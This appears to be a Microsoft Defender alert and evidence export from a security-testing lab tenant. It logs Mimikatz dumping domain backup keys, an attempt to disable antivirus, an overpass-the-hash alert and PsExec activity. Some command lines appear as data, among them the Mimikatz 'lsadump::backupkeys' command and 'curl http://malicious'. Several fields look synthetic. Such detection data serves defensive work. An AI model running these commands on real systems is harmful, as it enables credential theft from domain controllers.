[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "vpn.zone", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "None", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:04:26.0433333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:04:26.0433333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit", "processCreationTime": "2022-11-21T02:02:27.0051694Z", "processId": 8844, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:08:07.0866667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit", "processCreationTime": "2022-11-21T02:06:53.5444799Z", "processId": 10200, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:13:43.88Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit", "processCreationTime": "2022-11-21T02:11:50.2848714Z", "processId": 2256, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:15:56.4766667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": null, "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit", "processCreationTime": "2022-11-21T02:15:09.28664Z", "processId": 11856, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:34:51.21Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit", "processCreationTime": "2022-11-21T02:33:53.1469628Z", "processId": 2044, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638041865105979370_382804972
25d9dfec-e488-44ad-b1dd-472b4578a73a
730
MicrosoftDefenderForEndpoint
2022-11-16T09:08:30.5979613Z
2022-11-19T01:35:44.2066667Z
2022-11-19T01:35:44.1866667Z
2022-11-16T09:05:41.3077996Z
2022-11-16T09:05:41.3077996Z
Attempt to turn off Microsoft Defender Antivirus protection
An attempt was made to turn off a protection feature in Microsoft Defender Antivirus. An attacker might be trying to evade detection.
DefenseEvasion
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
ac5d5f4f-fab6-41d4-b1b0-552f3c51cea1
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1562.001" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "evilcorp.cn", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV2" } ], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "High", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
[ { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": null, "deviceId": null, "domainName": "NT AUTHORITY", "entityType": "User", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": "AntiVirus.psm1", "filePath": "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "59f430a85fe692483ea73cd4338d7a1f4dbce5af", "sha256": "1c0f9c9177787b3146332dd0f112444d3062214f6e71e1a4bc16b1fb55818a86", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T09:04:31.5834723Z", "parentProcessFileName": "SenseCM.exe", "parentProcessFilePath": "C:\\Program Files\\Windows Defender Advanced Threat Protection", "parentProcessId": 7224, "processCommandLine": "powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command \"& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\AntiVirus.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\AntiVirus.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '1c0f9c9177787b3146332dd0f112444d3062214f6e71e1a4bc16b1fb55818a86')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\EDR.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\EDR.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'f84b9499bd9dc40b993886d328828a2ed82541e54b76f9cb9e04c007eb97d8be')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\Firewall.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\Firewall.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '2490d8e22c01e09f99c8e32a044d6c150e75e8e75028809f73fffd9d3bf4ed92')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\GroupPolicyObject.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\GroupPolicyObject.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '5b251a22c68070bcb6be4c85e71232067581fa1483ce767e2e9fbe98a4db0229')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\PolicyEnforcer.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\PolicyEnforcer.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '13ff49e1e4a5017ae784cbe39648f9f18af975c2ce9616d52d7d7b32bec05e50')) { exit 323;}; . 'C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\PolicyEnforcer.ps1' }\"", "processCreationTime": "2022-11-16T09:04:33.0593386Z", "processId": 8912, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f43d9bb316e30ae1a3494ac5b0624f6bea1bf054", "sha256": "9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": "SenseCM.exe", "filePath": "C:\\Program Files\\Windows Defender Advanced Threat Protection", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:24.8166991Z", "parentProcessFileName": "MsSense.exe", "parentProcessFilePath": "C:\\Program Files\\Windows Defender Advanced Threat Protection", "parentProcessId": 2240, "processCommandLine": "\"SenseCm.exe\" \"eyJCYXNlQ25jQ2hhbGxlbmdlVXJsIjoiaHR0cHM6Ly93aW5hdHAtZ3ctZXVzMy5taWNyb3NvZnQuY29tLyIsIkNsaWVudFZlcnNpb24iOiIxMC44MjEwLjE5MDQxLjIxOTMiLCJDb21tYW5kUGFyYW1ldGVycyI6IntcImNvcnJlbGF0aW9uSWRcIjpcInsyM0UxMUQ3Ri02NzBDLTQ2QjItOERCRS1GODhGNjFERjhDMTh9XCIsXCJzY3JpcHRzQ29uZmlnU2lnbmF0dXJlXCI6XCJLUkU3cTVJVHNKVWdjNzltT1M3czJNd2g5NERhbWNvaE1jNkNzMHJQNHlvRHIzMTFNWU9qc2IrcFJSL2I5aENVU2ZVSlp1enlkTFYvbjk1eUZDUUlRMW5kSFc0NnFEU2gwUnA4UEhtSkxlbWpna21VMndlVVBQT1BUM0drZE5KV0pxc0NrZXpLSTlpb0tjS0V4NCtVR2xlRHdOODg4VGtiU3NnMUVuVHdMTFJhM3QwdGQwRDd0Ynk4VmhZeEg3a0ptT3dCcHhxUWVVWUVCRHdtdlJEbGhPREJ5MTdtMVZKc3ZjVWtWK0xGNkFaY3lySkV5WEEveStNVERYUEtIa0FROGYvUGM0ZWhnemJBMDUrTk9qZHVaeXFsdjBmUXk2ZlZpOGlCbW1USXdYME5RU2RjSzdKaGRUL1dJdXNtUkJCZWttWjRPTG5neHhmdXdJNWhCN2VjbkE9PVwifSIsIkNvbW1hbmRUeXBlIjoiQ2hlY2tJbiIsIk1hY2hpbmVJZCI6IjM2MTUwYjNjMWI2OWI1YzJkYTlkZjRlZmQ4NmFjNmMxNjY5MjRhNDgiLCJPcmdJZCI6IjMyY2YyMDJiLTEwMmUtNGQ1NC1iMjNkLWNmNTliNDJjZTBmZCIsIlByb3h5SW5mb3JtYXRpb24iOnsiQ25jUHJveHkiOiIiLCJNZW1Qcm94eSI6IiJ9fQ==\"", "processCreationTime": "2022-11-16T09:04:31.5834723Z", "processId": 7224, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "df74fb5ac185f503b3d8ad41dd692837b8cbae5f", "sha256": "32a2d7c9b290a8fa29ec6cb25448518920ec81e52ae45a7b9c1581451f08796f", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": "EDR.psm1", "filePath": "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "afb4863545535e35128e4be4208513cf39f6774e", "sha256": "f84b9499bd9dc40b993886d328828a2ed82541e54b76f9cb9e04c007eb97d8be", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": "Firewall.psm1", "filePath": "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "5c964b2f15f51226beee127479a3faa43ef3ca3b", "sha256": "2490d8e22c01e09f99c8e32a044d6c150e75e8e75028809f73fffd9d3bf4ed92", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": "GroupPolicyObject.psm1", "filePath": "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "5da25b7b5fe6003cfd98ab7bd7f37c010fcad756", "sha256": "5b251a22c68070bcb6be4c85e71232067581fa1483ce767e2e9fbe98a4db0229", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": "PolicyEnforcer.ps1", "filePath": "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6619021d8817281b5154d061e4f22786fc755ad1", "sha256": "13ff49e1e4a5017ae784cbe39648f9f18af975c2ce9616d52d7d7b32bec05e50", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Registry", "evidenceCreationTime": "2022-11-16T09:08:30.79Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": "HKEY_LOCAL_MACHINE", "registryKey": "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "registryValue": "", "registryValueType": "Unknown", "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:04:34.8433333Z
Suspicious
None
analyst
MSDXV2
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T13:46:17.65Z
Suspicious
None
darol
staging.net
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:20:30.33Z
Suspicious
None
user1
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:58:22.77Z
Benign
None
SYSTEM
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
4,216
PSEXESVC.exe
2022-12-22T08:47:50.8661147Z
748
2022-12-22T08:38:52.5569028Z
services.exe
C:\Windows\System32
Detected
4f111b3b2366eacdcc66d7ad73548fff9b039c15
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:17:48.44Z
Suspicious
None
jeff
rnd.local
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:59:19.3833333Z
Suspicious
None
jeff
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
7,772
curl http://malicious
2022-12-22T08:47:23.3350389Z
6,324
2022-12-22T08:47:11.8139068Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:48:30.9266667Z
Suspicious
None
jeff
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d
8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b
explorer.exe
C:\Windows
1,896
ipconfig
2022-12-22T08:26:24.0772409Z
2,796
2022-12-22T08:26:23.9030784Z
userinit.exe
C:\Windows\System32
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T20:36:54.8233333Z
Suspicious
None
root
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T15:27:27.03Z
Unknown
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:03:43.73Z
Suspicious
None
analyst
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
4f4970c3545972fea2bc1984d597fc810e6321e0
25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369
net.exe
C:\Windows\System32
1,768
"net.exe" user /domain
2022-11-21T02:01:37.7396253Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:03:39.9733333Z
Suspicious
None
jeff
corp.local
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:48:29.9566667Z
Suspicious
None
jeff
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d
8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b
explorer.exe
C:\Windows
1,896
powershell -enc ZABpAHIA
2022-12-22T08:26:24.0772409Z
2,796
2022-12-22T08:26:23.9030784Z
userinit.exe
C:\Windows\System32
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
aa0bf3e5da-67d0-4cd4-a60c-d1ec8b17906e
0bf3e5da-67d0-4cd4-a60c-d1ec8b17906e
765
MicrosoftDefenderForIdentity
2022-11-21T02:07:45.9143894Z
2022-11-21T02:07:51.7233333Z
null
2022-11-21T02:01:35.967662Z
2022-11-21T02:05:28.399996Z
Suspected overpass-the-hash attack (Kerberos)
Ron Henderson (Helpdesk Administrator) on MSDXV2-Win10V successfully authenticated against MSDXV2-DC.
DefenseEvasion
New
High
null
UnsupportedAlertType
null
null
AzureATP
AbnormalKerberosOverpassTheHashSecurityAlert
null
null
null
[ "T1550", "T1550.002" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "vpn.zone", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } }, { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "vpn.zone", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": 